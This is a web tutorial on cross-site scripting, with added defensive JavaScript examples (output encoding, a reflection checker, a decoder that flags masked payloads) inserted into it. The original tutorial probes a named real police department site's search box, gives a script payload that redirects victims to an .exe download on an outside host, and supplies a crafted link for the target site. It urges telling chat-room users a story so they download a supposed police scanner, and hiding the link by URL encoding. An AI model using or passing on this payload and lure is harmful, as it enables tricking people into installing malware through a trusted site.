Introduction:
=======
In this tutorial I will show you
how XSS works and how it can be abused.
What is XSS?
==================
XSS (cross-site scripting) is a vulnerability in a web application
that lets an attacker execute scripts
on the client side, in the browsers of other users of that site.
Dangers of XSS...
Today's browsers keep some of the dangers of XSS out.
For example, a script cannot simply write or edit files on the computer:
the browser sandbox blocks that, or asks the user for extra permission first.
But the injected script runs with the same rights as the site's own scripts,
so it can read that site's cookies, send requests as the logged-in user and change what the page shows.
How does XSS work?
If a user posts something to a webpage, for example a search engine such as:
Code:
http://search.live.com
the search engine shows what keyword the user typed.
Example:
I gave the keyword:
Code:
www.djoedjoe.com
You see that the search engine outputs my keyword again.
If a web application processes the input from the user
without encoding it, for example the user input:
xss-tutorial
it will look like this in the source:
Code:
........ <p> your keyword was: xss-tutorial </p> .......
In this case it all seems very normal.
But what if the user input was:
Code:
<script>alert("xss-tutorial");</script>
It would be in the source like this:
Code:
.....
<p>Your keyword was: <script>alert("xss-tutorial");</script> </p>
.....
This does not look very normal on the screen: instead of the keyword, the browser pops up an alert box saying xss-tutorial.
So what happened is that the user input
was actually JavaScript
that did not get encoded by the web application:
it did not turn characters like < > " ' into their HTML entities (&lt; &gt; &quot; &#x27;).
A browser builds a page by reading the source:
it parses every HTML tag and renders it
directly on the screen.
Script languages like JavaScript
get executed then too.
It might be that this is still a bit confusing, so I will try to make it clearer.
This is what happens when a web application (like a search engine) does not encode the user input:
1. As keyword you enter JavaScript.
2. The search engine checks whether your keyword matches its records, and builds a page with the results.
3. The search engine builds the rest of the page (like ads and so on) and puts your keyword directly (without encoding it first) into the page too.
4. The web server sends the page (source) to you.
5. Your browser reads every line of the source and renders it on the screen.
6. Finally the browser also reads your JavaScript input, <script></script>, and executes it.
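As an added example (my own code, not code from this tutorial), here is what step 3 looks like when the search engine builds its results page the vulnerable way and the correct way. The page layout and the function names buildResultsPageVulnerable, buildResultsPageSafe, escapeHtml and containsScriptTag are my own assumptions; the two keywords are the ones used above.

```javascript
// Added example, not from the original tutorial: a minimal "search results"
// page builder, once the way the vulnerable search engine behaves (keyword
// pasted straight into the HTML) and once with HTML output encoding.
// Names and the page layout are my own assumptions.

// Every character that has meaning in HTML mapped to its entity. Encoding all
// five means the keyword can never close a text node, a tag or an attribute,
// whichever of those contexts it is inserted into.
const HTML_ENTITIES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// The tutorial's step 3: the server drops the keyword into the page as-is.
function buildResultsPageVulnerable(keyword) {
  return `<html><body>
<p>Your keyword was: ${keyword}</p>
<div id="results"></div>
</body></html>`;
}

// The fix: the same page, but the keyword is encoded before it is concatenated.
function buildResultsPageSafe(keyword) {
  return `<html><body>
<p>Your keyword was: ${escapeHtml(keyword)}</p>
<div id="results"></div>
</body></html>`;
}

// Rough stand-in for the browser's parser: is there a <script> start tag in
// the page? The server writes none itself, so any such tag came from input.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed inputs: the tutorial's harmless keyword and its probe payload.
const NORMAL_KEYWORD = "xss-tutorial";
const XSS_KEYWORD = '<script>alert("xss-tutorial");</script>';

function demo() {
  return {
    normalVulnerable: containsScriptTag(buildResultsPageVulnerable(NORMAL_KEYWORD)), // false
    payloadVulnerable: containsScriptTag(buildResultsPageVulnerable(XSS_KEYWORD)),   // true
    payloadSafe: containsScriptTag(buildResultsPageSafe(XSS_KEYWORD)),               // false
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with node. The vulnerable page contains a live <script> element for the payload keyword, the safe page contains only the text `&lt;script&gt;...` which the browser displays instead of executing, and the harmless keyword passes through both. The rule this shows: the fix for reflected XSS is to HTML-encode on output, in the context where the data lands, rather than trying to filter "bad" characters out of the input.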
I hope it is a bit clearer now how it works.
I will show you some examples of how XSS is used,
and why it is a big problem.
How to find and use XSS?
XSS is dangerous because people are misled easily.
There are scripts that, for example, steal user cookies;
hackers can then use those stolen cookies to act as the victim on that site.
I am not going further into cookie stealing, but I will give
you another example of how to abuse XSS vulnerabilities.
As I said, you can mislead people by using those XSS vulnerabilities:
you can make someone download something
by using an XSS on a trusted website.
Example:
You would not expect that downloading something
from
Code:
http://www.lapdonline.org/
would be some kind of malware (a trojan or something).
Well, let's see if we can change that.
We are going to search for an XSS vulnerability on that website.
Go to:
Code:
http://www.lapdonline.org/
You will see a search function under the banner.
Let's see if the search engine encodes our keyword.
Enter as keyword:
Code:
<script>alert("test");</script>
Then click on GO.
Yeah, it worked! The alert box with the text "test" pops up, so the keyword was put into the page unencoded.
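The alert box is the visual version of a check you can also do on the raw response. As an added example (my own code, not from this tutorial), the function below takes the HTML a server sent back for a probe keyword and classifies how the probe was reflected, which also covers the cases where the alert does not pop but the input was only partly filtered. The token, the function names and the four sample responses are my own constructions.

```javascript
// Added example, not from the original tutorial: a programmatic version of the
// "enter <script>alert(...)</script> and see if it pops" test. Instead of
// watching for the alert box it reads the HTML the server sent back and
// classifies how the probe was reflected. Function names, the token and the
// sample responses below are my own constructions.

// A unique token lets us find our own input even when the site's markup
// contains <script> tags of its own.
function makeProbe(token) {
  return `<script>alert("${token}");</script>`;
}

// Classify a server response for a search done with makeProbe(token).
//   "reflected-unencoded"    the <script> tag came back intact (exploitable,
//                            this is the tutorial's "it worked")
//   "reflected-html-encoded" the site turned < > " into entities (safe)
//   "reflected-modified"     token came back but the tags were changed or
//                            stripped; needs a manual look for a bypass
//   "not-reflected"          the input is not in the page at all
function classifyReflection(body, token) {
  const probe = makeProbe(token);
  if (body.includes(probe)) return "reflected-unencoded";
  const idx = body.indexOf(token);
  if (idx === -1) return "not-reflected";
  // Look at the 40 characters before the token: an encoded reflection has
  // "&lt;script&gt;alert(&quot;" there, a stripped one has just "alert(".
  const before = body.slice(Math.max(0, idx - 40), idx);
  if (/&lt;script&gt;/i.test(before)) return "reflected-html-encoded";
  return "reflected-modified";
}

const TOKEN = "xss7f3a91";

// Constructed sample responses, one per behaviour.
const SAMPLE_RESPONSES = {
  vulnerable: `<html><body><p>Your keyword was: <script>alert("${TOKEN}");</script></p></body></html>`,
  encoded: `<html><body><p>Your keyword was: &lt;script&gt;alert(&quot;${TOKEN}&quot;);&lt;/script&gt;</p></body></html>`,
  stripped: `<html><body><p>Your keyword was: alert("${TOKEN}");</p></body></html>`,
  dropped: `<html><body><p>No results.</p></body></html>`,
};

function classifyAll() {
  const out = {};
  for (const [name, body] of Object.entries(SAMPLE_RESPONSES)) {
    out[name] = classifyReflection(body, TOKEN);
  }
  return out;
}

console.log(classifyAll());
```

In practice you would fetch the search URL with the probe as the keyword and pass the response body to classifyReflection. Only "reflected-unencoded" is the situation the tutorial goes on to abuse; "reflected-modified" means some filter is in the way and is where the real testing work starts.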
Well, how can we abuse this?
We know that we can put JavaScript in as keywords,
and most people would not suspect that website of anything bad,
so it is good enough to mislead people with it.
We could enter JavaScript that redirects people to a trojan (in this tutorial I am not using a real trojan).
Well, if that is what we want to do,
we will use this little script:
Code:
<script>document.location="http://tuts.djoedjoe.com/basicxss/eng/policescanner.exe";</script>
Go back to:
Code:
http://www.lapdonline.org/
and enter that script in the search engine and click on GO.
Look at that, we have been redirected to our file.
This file, named policescanner.exe, could be a trojan.
You could go into a chat room or community
and say it is a police scanner!
You would then just give people the link from your browser:
Code:
http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cscript%3Edocument.location=%22http://tuts.djoedjoe.com/basicxss/eng/policescanner.exe%22;%3C/script%3E
People mostly read only the first part of a link before clicking on it,
in this case:
Code:
http://www.lapdonline.org/
Well, they will think it is an LAPD website, and you are talking about a police scanner, so why not download it?
Maybe when someone looks closely they will see the link to your trojan:
Code:
http://tuts.djoedjoe.com/basicxss/eng/policescanner.exe
and notice it is fake.
But no worries, with a URL encoder you can 'mask' that.
Just encode the link to the 'policescanner' like this (screenshot):
Code:
http://tuts.djoedjoe.com/basicxss/eng/images/xss6.JPG
and replace the link of the 'policescanner' in the script with the encoded text.
Note that this only hides the link from a human reading the URL: the server decodes the parameter once before putting it in the page, so the browser still runs the same redirect, and anyone who URL-decodes the link sees the real target.
Make up a good story and people will really download it.
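The other side of that mask: one decoding pass shows exactly what the victim's browser will run. As an added example (my own code, not from this tutorial), the functions below pull the parameters out of a link shaped like the one above and flag any parameter whose decoded value carries script. The sample link is my own construction in the same shape as the tutorial's (parameters after "/&" rather than "?"), using example domains; the function names are mine as well.

```javascript
// Added example, not from the original tutorial: the defender's side of the
// URL-encoding trick. The "masked" link is just percent-encoded, and the
// server and browser decode it once before using it, so a single decoding
// pass reveals the payload. Sample URLs and function names are my own.

// decodeURIComponent throws on malformed sequences such as "%E0%A4%A"; keep
// the raw text in that case rather than crash on a crafted link.
function safeDecode(text) {
  try {
    return decodeURIComponent(text.replace(/\+/g, " "));
  } catch (e) {
    return text;
  }
}

// Pull name=value pairs out of a link. Everything after the first "?" or "&"
// is treated as the parameter list, so path-style links like the tutorial's
// ".../search/&search_terms=..." are handled as well as ordinary "?a=b" ones.
function extractParams(url) {
  const start = url.search(/[?&]/);
  const params = {};
  if (start === -1) return params;
  for (const pair of url.slice(start + 1).split("&")) {
    if (pair === "") continue;
    const eq = pair.indexOf("=");
    const name = eq === -1 ? pair : pair.slice(0, eq);
    const value = eq === -1 ? "" : pair.slice(eq + 1);
    params[safeDecode(name)] = safeDecode(value);
  }
  return params;
}

// Flag parameters whose decoded value carries script: a <script> tag,
// a javascript: URL or an inline event handler such as onerror=.
const SCRIPT_PATTERN = /<script\b|javascript:|\bon\w+\s*=/i;

function findInjectedScript(url) {
  const hits = [];
  for (const [name, value] of Object.entries(extractParams(url))) {
    if (SCRIPT_PATTERN.test(value)) hits.push({ name, value });
  }
  return hits;
}

// Constructed sample: the tutorial's redirect payload, with the target link
// percent-encoded ("masked") inside an already encoded parameter.
const MASKED_URL =
  "http://www.example-pd.org/search_results/search/&view_all=1&chg_filter=1" +
  "&searchType=content_basic&search_terms=%3Cscript%3Edocument.location%3D" +
  "%22http%3A%2F%2Fattacker.example%2Fpolicescanner.exe%22%3B%3C%2Fscript%3E";

// Constructed sample: a normal search for comparison.
const BENIGN_URL =
  "http://www.example-pd.org/search_results/search/&view_all=1&search_terms=police%20scanner";

console.log(findInjectedScript(MASKED_URL));
```

findInjectedScript(MASKED_URL) returns one hit on search_terms whose value is the plain `<script>document.location="http://attacker.example/policescanner.exe";</script>`, encoded target and all, while the benign search returns nothing. The same one-pass decode is what a mail gateway or proxy log review can apply to links before anyone clicks them.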
Tool used in tutorial:
URL Encoder -
Code:
http://files.djoedjoe.com/urlenc/urlenc.zip

